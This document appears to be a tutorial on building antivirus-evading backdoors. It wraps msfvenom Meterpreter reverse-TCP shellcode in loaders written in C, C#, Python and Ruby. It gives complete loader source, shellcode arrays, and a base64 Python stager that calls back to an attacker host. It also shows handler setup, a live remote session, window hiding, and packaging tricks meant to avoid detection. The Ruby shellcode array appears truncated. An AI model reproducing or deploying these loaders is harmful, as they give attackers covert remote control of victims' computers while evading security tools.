It is well known that today's antivirus engines detect malware in three main ways: by signature, by behaviour, and by cloud lookup, and in practice the cloud approach mostly reduces to signature matching as well. Whichever engine it is, it inspects the PE file starting with its header, and the larger the backdoor executable is, the more material there is to match and the more easily it is flagged. The sections below therefore keep the stager small and move it out of the usual places: a short msfvenom shellcode embedded in a loader written in C, C#, Python and Ruby.

Building the backdoor in C

1. First use msfvenom to generate a short piece of shellcode, here connecting back to LHOST=192.168.1.7 and LPORT=8888. When the command runs it prints hexadecimal text; that text is the machine code written as C escape sequences. The parameters are explained below the output.

[root@localhost ~]# msfvenom -a x86 --platform Windows \
> -p windows/meterpreter/reverse_tcp \
> -b '\x00\x0b' LHOST=192.168.1.7 LPORT=8888 -f c
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Payload size: 368 bytes
Final size of c file: 1571 bytes
unsigned char buf[] =
"\xd9\xc5\xd9\x74\x24\xf4\xba\x8b\xfc\x02\xdd\x5e\x2b\xc9\xb1"
"\x56\x83\xee\xfc\x31\x56\x14\x03\x56\x9f\x1e\xf7\x21\x77\x5c"
"\xf8\xd9\x87\x01\x70\x3c\xb6\x01\xe6\x34\xe8\xb1\x6c\x18\x04"
"\x39\x20\x89\x9f\x4f\xed\xbe\x28\xe5\xcb\xf1\xa9\x56\x2f\x93"
"\xca\xec\x3f\xcd\x34\xa2\x40\xc4";

-a               # target architecture of the payload
--platform       # target platform of the payload
-p, --payload    # payload (attack load) to use
-f, --format     # output format (run msfvenom --help-formats to list them)
-b '\x00\x0b'    # bad characters the encoder must avoid, here NUL and vertical tab

2. Copy the shellcode above, open Visual Studio Express and write the following C program, which calls the shellcode through inline assembly. Build it as a 32-bit (Win32) project: the payload is x86, and the MSVC x64 compiler does not support __asm blocks at all.

#include <stdio.h>
#include <windows.h>

// #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")  // hide the console window
#pragma comment(linker,"/INCREMENTAL:NO")       // smaller binary
#pragma comment(linker, "/section:.data,RWE")   // make .data readable, writable AND executable,
                                                // so the array can be run without VirtualProtect

unsigned char shellcode[] =
"\xd9\xc5\xd9\x74\x24\xf4\xba\x8b\xfc\x02\xdd\x5e\x2b\xc9\xb1"
"\x56\x83\xee\xfc\x31\x56\x14\x03\x56\x9f\x1e\xf7\x21\x77\x5c"
"\xf8\xd9\x87\x01\x70\x3c\xb6\x01\xe6\x34\xe8\xb1\x6c\x18\x04"
"\x39\x20\x89\x9f\x4f\xed\xbe\x28\xe5\xcb\xf1\xa9\x56\x2f\x93"
"\xca\xec\x3f\xcd\x34\xa2\x40\xc4";

int main(int argc, char **argv)
{
    __asm
    {
        lea eax, shellcode   // address of the array
        call eax             // jump into it
    }
    return 0;
}

Besides the inline-assembly form above, I have also collected a few other ways of transferring control to the shellcode.

// Method 1: cast the array to a function pointer and call it
void RunShellCode_2()
{
    ((void(*)(void))&shellcode)();
}

// Method 2: load the address and jmp instead of call (no return)
void RunShellCode_3()
{
    __asm
    {
        lea eax, shellcode;
        jmp eax;
    }
}

// Method 3: same, using the symbol's offset
void RunShellCode_4()
{
    __asm
    {
        mov eax, offset shellcode;
        jmp eax;
    }
}

// Method 4: emit the raw opcode bytes of "jmp eax" (FF E0) so the mnemonic never appears
void RunShellCode_5()
{
    __asm
    {
        mov eax, offset shellcode;
        _emit 0xFF;
        _emit 0xE0;
    }
}

3. On the MSF host, start the handler.

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > show options
msf5 exploit(multi/handler) > set lhost 192.168.1.7
lhost => 192.168.1.7
msf5 exploit(multi/handler) > set lport 8888
lport => 8888
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.7:8888

Run the compiled program and a session comes back.

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.7:8888
[*] Sending stage (179779 bytes) to 192.168.1.2
[*] Meterpreter session 1 opened (192.168.1.7:8888 -> 192.168.1.2:36805)
meterpreter > sysinfo
Computer : lyshark
OS : Windows 10 (Build 19999).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >

Building the backdoor in C#

The C# compiler on Windows is csc.exe. If the .NET Framework SDK is installed on the C: drive you will find it in a version-numbered subdirectory of C:\Windows\Microsoft.NET\Framework64. For convenience, add that directory to the Path environment variable.

1. Generate the shellcode with msfvenom and save it to lyshark.txt. This is an x64 stager using the UUID-tracking transport, so the handler later must be set to the same payload name.

[root@localhost ~]#  msfvenom --platform Windows -a x64 -p windows/x64/meterpreter/reverse_tcp_uuid \
> LHOST=192.168.1.30 LPORT=8080 -b '\x00' \
> -e x64/xor -i 10 -f csharp \
> -o ./lyshark.txt

2. Paste the generated shellcode into the loader program.

using System;
using System.Runtime.InteropServices;
namespace TCPMeterpreterProcess
{
class Program
{
static void Main(string[] args)
{
// The shellcode from lyshark.txt (951 bytes after 10 rounds of x64/xor)
byte[] shellcode = new byte[951] {
0x48,0x31,0xc9,0x48,0x81,0xe9,0x8e,0xff,0xff,0xff,0x48,0x8d,0x05,0xef,0xff,
0xff,0xff,0x48,0xbb,0xa9,0x1e,0xb2,0x1e,0x97,0xb9,0xdc,0x04,0x48,0x31,0x58,
0x27,0x48,0x2d,0xf8,0xff,0xff,0xff,0xe2,0xf4,0xe1,0x2f,0x7b,0x56,0x16,0x50,
0x4f,0xfb,0x56,0xe1,0xfa,0x93,0x92,0x56,0x23,0xfb,0x56,0x56,0x09,0x0c,0xb8,
0x16,0xa5,0xb6,0x2c,0x64,0xbd,0x56,0xa6,0xe1,0xfb,0x4c,0x84,0xe6,0x4d,0xe1,
0x68,0x5b,0x28,0x5e,0xb7,0x78,0x83,0x2d,0xfb,0x5b,0x2c,0xe9,0x79,0xf9,0x46,
0xa9,0xfd,0x3c,0x2c,0xe9,0xce,0x0a,0x9a,0xfa,0x03,0xc7,0x18,0x47,0x90,0xc3,
0x83,0x9d,0x4a,0xe4,0x9b,0x3b,0x7e,0x4e,0x34,0x53,0xf0,0x37,0xca,0x71,0x5e,
0xfd,0x81,0x14,0x99,0x4e,0x7d,0xbf,0xdf,0x38,0x05,0x12,0xfb,0x4e,0x7d,0x08,
0x2c,0x2b,0x42,0xe6,0xbc,0x1e,0x98,0x2a,0xf3,0xfd,0x31,0xa5,0x23,0xf9,0xaf,
0xb8,0x68,0x4a,0xff,0x1f,0xf0,0x67,0xf1,0x92,0x67,0x9b,0xf3,0x35,0x9f,0xd0,
0x3f,0x13,0xa2,0x1f,0xf5,0x68,0x9f,0xd0,0x88,0xe0,0xb6,0x88,0x26,0x71,0xaa,
0xa9,0x0c,0xe6,0x67,0x2b,0x42,0xb0,0x28,0x02,0x38,0xa4,0xd0,0xe5,0xf8,0x63,
0xb1,0x8c,0x35,0xf5,0x64,0x75,0x71,0xd5,0x06,0x42,0xb4,0x30,0xe0,0x73,0x29,
0xd5,0x06,0xf5,0x47,0x80,0xbc,0xe3,0x0f,0x19,0x83,0x27,0x8c,0xf5,0xd4,0xc4,
0xf1,0x62,0xd4,0x45,0x03,0x42,0x1a,0x7e,0x22,0x5f,0x91,0x0b,0x6d,0x0f,0x76,
0xaa,0x59,0xe8,0x5f,0x8a,0xa8,0x8b,0x70,0xf9,0x59,0xe8,0xe8,0x79,0x28,0x5a,
0xd8,0xb3,0x68,0x82,0xb5,0x86,0x6d,0xbf,0xc7,0x21,0xee,0x3a,0x58,0x3d,0xda,
0x71,0x7d,0xf2,0xe3,0xf2,0x2e,0x3f,0x6a,0xf2,0x3b,0xbd,0x54,0x3c,0xaf,0xfa,
0xee,0xf4,0x75,0xbd,0x54,0x8b,0x5c,0x51,0x36,0x2b,0x46,0x92,0xd9,0x8a,0x1f,
0x3f,0xda,0x43,0xad,0x0a,0x86,0x3b,0x18,0x88,0x14,0xf9,0x7e,0x2c,0x47,0x3a,
0x63,0x26,0x70,0xe4,0x8d,0x9b,0x89,0xbb,0xa6,0xa2,0x76,0xad,0x8d,0x9b,0x3e,
0x48,0x1c,0x1f,0x95,0xca,0x0d,0x10,0x42,0xce,0x63,0x96,0xc1,0x75,0x3a,0x49,
0x8e,0x0c,0xd4,0x58,0x7b,0xa6,0x0d,0xed,0xb3,0x23,0xd5,0x3a,0x16,0x90,0xba,
0x23,0x32,0xe6,0x51,0x3c,0x52,0x90,0xba,0x94,0xc1,0xd7,0x4d,0xe5,0xcf,0xed,
0x5f,0xe2,0xc1,0x23,0x65,0x8b,0x8a,0x27,0x68,0x24,0x85,0x94,0xab,0x31,0x59,
0x2f,0x14,0x69,0xfc,0x19,0xa6,0x21,0x16,0xd3,0x5c,0xab,0x49,0xa8,0x1e,0xbf,
0x47,0x85,0x14,0xdb,0xca,0x8c,0x06,0x66,0x44,0xb3,0x14,0x61,0x4a,0xf1,0x06,
0x66,0x44,0xf3,0x14,0x61,0x6a,0xb9,0x06,0xe2,0xa1,0x99,0x16,0xa7,0x29,0x20,
0x06,0xdc,0xd6,0x7f,0x60,0x8b,0x64,0xeb,0x62,0xcd,0x57,0x12,0x95,0xe7,0x59,
0xe8,0x8f,0x0f,0xfb,0x81,0x1d,0xbb,0x50,0x62,0x1c,0xcd,0x9d,0x91,0x60,0xa2,
0x19,0x39,0x28,0x6c,0x6e,0xcb,0x57,0xe8,0x17,0x6c,0x3c,0xed,0x16,0xd3,0xd7,
0x6a,0x90,0xe9,0x4e,0xed,0x5e,0x56,0x9c,0x9e,0x7f,0xa1,0x4f,0x3d,0x46,0x58,
0x14,0xf2,0x5c,0x62,0x0e,0xcd,0x5f,0xd2,0x8c,0x09,0x4e,0xa1,0xb1,0x24,0x57,
0x58,0x68,0x62,0x50,0xe8,0x98,0xa0,0x27,0x1a,0x14,0xdb,0xd8,0x45,0x0f,0x2c,
0xdf,0xde,0x1d,0xeb,0xd9,0xd1,0xae,0x98,0xe7,0x9f,0x5f,0xa6,0x3c,0xe1,0x0b,
0xd4,0xc7,0xa6,0x84,0xb2,0x5c,0x62,0x0e,0xc9,0x5f,0xd2,0x8c,0x8c,0x59,0x62,
0x42,0xa5,0x52,0x58,0x1c,0xf6,0x51,0xe8,0x9e,0xac,0x9d,0xd7,0xd4,0xa2,0x19,
0x39,0x0f,0xb5,0x57,0x8b,0x02,0xb3,0x42,0xa8,0x16,0xac,0x4f,0x92,0x06,0xa2,
0x9b,0x05,0x6e,0xac,0x44,0x2c,0xbc,0xb2,0x59,0xb0,0x14,0xa5,0x9d,0xc1,0xb5,
0xa1,0xe7,0x16,0xb1,0xb0,0x5f,0x6d,0x2b,0x99,0x2a,0xb6,0x7d,0xdf,0x16,0xd3,
0x1d,0xbc,0x51,0x60,0xa8,0xa5,0x97,0x3f,0xfc,0xeb,0x18,0xe9,0x07,0x64,0xf3,
0x9a,0xe0,0xe8,0x18,0xf6,0xde,0x2d,0xbe,0xd2,0x42,0xab,0x4c,0xa0,0xc7,0x09,
0x5a,0x5a,0xad,0xab,0xa2,0xa5,0x39,0xcb,0x11,0x2c,0x89,0xa6,0x91,0x03,0x26,
0xec,0x17,0xd3,0x5c,0xb3,0x59,0x53,0x67,0x6d,0x7d,0xd3,0xa3,0x3f,0x72,0xe3,
0x0f,0xb3,0x46,0x83,0x11,0xdb,0xd1,0xa4,0x7f,0x2d,0x5e,0x2c,0x9c,0xa2,0x91,
0x2b,0x06,0x12,0xd6,0x9b,0xd5,0x2b,0x59,0x53,0xa4,0xe2,0xc9,0x33,0xa3,0x3f,
0x50,0x60,0x89,0x87,0x06,0x92,0x04,0xa6,0x91,0x0b,0x06,0x64,0xef,0x92,0xe6,
0x73,0xbd,0x9d,0x2f,0x12,0xc3,0x56,0x9c,0x9e,0x12,0xa0,0xb1,0x23,0x63,0x36,
0xb4,0x56,0x18,0xe9,0x4e,0xa0,0x27,0x1a,0x36,0xfa,0x59,0xb1,0xa6,0xfd,0x16,
0xd3,0x5c,0x8a,0xc6,0x40,0xf6,0xf2,0x4c,0xe3,0xb5,0xa8,0x07,0xaa,0x53,0xf2,
0x47,0xfa,0x74,0xb0,0x50,0x60,0xb7,0xa4,0xd1,0x11,0x9e,0x01,0x20,0xb6,0xb1,
0x38,0x5e,0x50,0xb0,0xfa,0x50,0x60,0xac,0xa0,0x27,0x1a,0x36,0xee,0x59,0xb1,
0x06,0x64,0xef,0x92,0xe6,0xe8,0xc1,0x21,0x11,0x12,0xc3,0x50,0xa4,0xea,0x66,
0xbc,0x06,0x6e,0xd2,0xf3,0x02,0x63,0xee,0x83,0x0e,0xac,0x4f,0xbb,0x5c,0xfa,
0x18,0xe9,0x0f,0xb5,0x5e,0x5a,0xae,0xa2,0x29,0x20,0x0f,0x57,0x4e,0x77,0x0f,
0x0f,0xe7,0x3c,0x06,0x64,0xd5,0x9a,0xd5,0x2d,0x55,0xd8,0x87,0xa4,0x9f,0x23,
0x14,0x63,0xc2,0xa1,0xc7,0x14,0x57,0x69,0x5e,0x33,0xd0,0xb6,0xb1,0x38,0x95,
0x2b,0x5c,0x97,0x30,0xb1,0x0f,0xba,0x4f,0xbb,0x5c,0xaa,0x18,0xe9,0x0f,0xb5,
0x7c,0xd3,0x06,0xab,0xa2,0xe2,0x61,0xe2,0x26,0x2c,0x89,0xbd,0x41,0xa8,0xf4,
0x98,0x78,0x9e,0x3d,0x15,0xcd,0xa0,0xb1,0x23,0xff,0xc0,0xa3,0x15,0xe7,0xa1,
0x4f,0x2e,0x5e,0xfa,0x9a,0xa2,0x9d,0x1f,0x3b,0x59,0x57,0x2c,0xbb,0xb2,0x72,
0xe9,0x17,0xa4,0xd1,0x11,0xac,0x5f,0xba,0xbf,0xb1,0x38,0x16,0x6f,0x72,0x42,
0xa6,0x2a,0x60,0xb1,0xd3,0x04 };

// Allocate an RWX region, copy the shellcode in, and run it on a new thread.
// Pointers are IntPtr throughout: with /platform:x64 a UInt32 silently
// truncates a 64-bit address.
IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UInt32)shellcode.Length,
    MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (funcAddr == IntPtr.Zero)
    return;
Marshal.Copy(shellcode, 0, funcAddr, shellcode.Length);
UInt32 threadId = 0;
IntPtr hThread = CreateThread(IntPtr.Zero, 0, funcAddr, IntPtr.Zero, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);   // INFINITE
CloseHandle(hThread);
}

private const UInt32 MEM_COMMIT = 0x1000;
private const UInt32 PAGE_EXECUTE_READWRITE = 0x40;

[DllImport("kernel32")]
private static extern IntPtr VirtualAlloc(IntPtr lpAddress, UInt32 dwSize,
    UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32")]
private static extern IntPtr CreateThread(IntPtr lpThreadAttributes, UInt32 dwStackSize,
    IntPtr lpStartAddress, IntPtr lpParameter, UInt32 dwCreationFlags, ref UInt32 lpThreadId);
[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
[DllImport("kernel32")]
private static extern bool CloseHandle(IntPtr hObject);
}
}

3. Compile the code with the C# compiler. I saved it as lyshark.cs, but any name works; the resulting binary is under 5 KB. The /unsafe switch is harmless but not actually needed, since the loader contains no unsafe blocks.

C:\Users\lyshark\Desktop>csc /unsafe /platform:x64 /out:lyshark.exe lyshark.cs
Microsoft (R) Visual C# Compiler version 4.7.3190.0
for C# 5
Copyright (C) Microsoft Corporation. All rights reserved.

4. Back in the MSF console, start the handler before running the program. The handler's payload must match what the shellcode was built from, windows/x64/meterpreter/reverse_tcp_uuid; with the x86 windows/meterpreter/reverse_tcp the wrong stage is sent and no session opens. Encoding of the second stage is switched on with EnableStageEncoding (EnableContextEncoding is a different option and does not make StageEncoder take effect).

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp_uuid
payload => windows/x64/meterpreter/reverse_tcp_uuid
msf5 exploit(multi/handler) > set lhost 192.168.1.30
lhost => 192.168.1.30
msf5 exploit(multi/handler) > set lport 8080
lport => 8080
msf5 exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf5 exploit(multi/handler) > set EnableStageEncoding true
EnableStageEncoding => true
msf5 exploit(multi/handler) > set StageEncoder x64/xor
StageEncoder => x64/xor
msf5 exploit(multi/handler) > set StageEncodingFallback false
StageEncodingFallback => false
msf5 exploit(multi/handler) > exploit -j -z

5. Run the backdoor on the client. Starting lyshark.exe directly is enough. The InstallUtil.exe launch below is the white-listed-binary trick, but it only executes code in a class derived from System.Configuration.Install.Installer that is marked [RunInstaller(true)] and overrides Uninstall; the loader above has only Main, so with /U nothing would run unless such a class is added. Use the InstallUtil of the framework version the assembly was compiled for (v4.0.30319 for the csc shown above; the v2.0.50727 runtime cannot load a .NET 4 assembly).

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U lyshark.exe

Building the backdoor in Python

1. First generate the payload and write it to lyshark.py.

[root@localhost ~]# msfvenom -p python/meterpreter/reverse_tcp \
> lhost=192.168.1.30 lport=8888 \
> -f raw -o lyshark.py

2. Copy the generated code by hand.

[root@localhost ~]# cat lyshark.py
import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMS4zMCcsODg4OCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=')))

3. Add a few lines above it that hide the console window. The final file looks like this. Note that the connect-back address and port are baked into the base64 blob (it decodes to a socket.connect to 192.168.1.30:8888), so regenerate it with msfvenom rather than editing it by hand.

import base64,sys
import ctypes

# Hide our own console window (SW_HIDE == 0). ShowWindow alone does the job;
# an HWND is not a kernel object handle, so CloseHandle on it would just fail.
whnd = ctypes.windll.kernel32.GetConsoleWindow()
if whnd != 0:
    ctypes.windll.user32.ShowWindow(whnd, 0)

exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMS4zMCcsODg4OCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=')))

4. Package it into an executable with pyinstaller; -F produces a single .exe. If the tool is missing, run pip install pyinstaller first. Adding -w (--noconsole) builds a windowed binary, so the console is never created in the first place and the ShowWindow lines become unnecessary.

C:\Users\lyshark\Desktop>pyinstaller -F lyshark.py
107 INFO: PyInstaller: 3.4
108 INFO: Python: 3.7.3
109 INFO: Platform: Windows-10-10.0.17763-SP0
113 INFO: wrote C:\Users\lyshark\Desktop\lyshark.spec
116 INFO: UPX is not available.
120 INFO: Extending PYTHONPATH with paths
['C:\\Users\\lyshark\\Desktop', 'C:\\Users\\lyshark\\Desktop']
121 INFO: checking Analysis
121 INFO: Building Analysis because Analysis-00.toc is non existent
121 INFO: Initializing module dependency graph...
124 INFO: Initializing module graph hooks...
129 INFO: Analyzing base_library.zip ...

5. In the MSF console open a handler and run the generated lyshark.exe; in this test it runs without being flagged by the antivirus.

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.30
lhost => 192.168.1.30
msf5 exploit(multi/handler) > set lport 8888
lport => 8888
msf5 exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.1.30:8888
msf5 exploit(multi/handler) > sessions -i

At present, apart from getting a callback through white-listed binaries, the Python backdoor has consistently been the most reliable of these, because Python is a scripting language and AV vendors have not paid much attention to it.

Building the backdoor in Ruby

There are two routes here: msfvenom can emit a pure-Ruby reverse shell, or a Ruby loader can execute native shellcode through Fiddle. The loader below uses the harmless windows/messagebox payload, generated in Ruby format with --smallest, as its test case.

[root@localhost ~]# msfvenom -p ruby/shell_reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f raw -o payload.rb
[root@localhost ~]# msfvenom -p windows/messagebox TEXT=Micropoor TITLE=Micropoor -f ruby --smallest

require 'fiddle'
include Fiddle

# x86 shellcode from the second msfvenom command above; it needs a 32-bit Ruby,
# because the payload itself is 32-bit code.
shellcode =
  "\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64" +
  "\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e" +
  "\x20\x8b\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60" +
  "\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b" +
  "\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01" +
  "\xee\x31\xff\x31\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d"

kernel32 = Fiddle.dlopen('kernel32')

# VirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE).
# The region is RWX from the start, so no VirtualProtect call is needed.
ptr = Function.new(kernel32['VirtualAlloc'],
                   [TYPE_VOIDP, TYPE_SIZE_T, TYPE_INT, TYPE_INT], TYPE_VOIDP)
               .call(0, shellcode.bytesize, 0x3000, 0x40)
raise 'VirtualAlloc failed' if ptr.null?

# RtlMoveMemory(dst, src, size): copy the bytes into the executable region
Function.new(kernel32['RtlMoveMemory'], [TYPE_VOIDP, TYPE_VOIDP, TYPE_SIZE_T], TYPE_VOID)
        .call(ptr, Pointer[shellcode], shellcode.bytesize)

# CreateThread(NULL, 0, start, NULL, 0, NULL), then wait for it (INFINITE == -1)
thread = Function.new(kernel32['CreateThread'],
                      [TYPE_VOIDP, TYPE_SIZE_T, TYPE_VOIDP, TYPE_VOIDP, TYPE_INT, TYPE_VOIDP], TYPE_VOIDP)
                 .call(0, 0, ptr, 0, 0, 0)
Function.new(kernel32['WaitForSingleObject'], [TYPE_VOIDP, TYPE_INT], TYPE_INT).call(thread, -1)
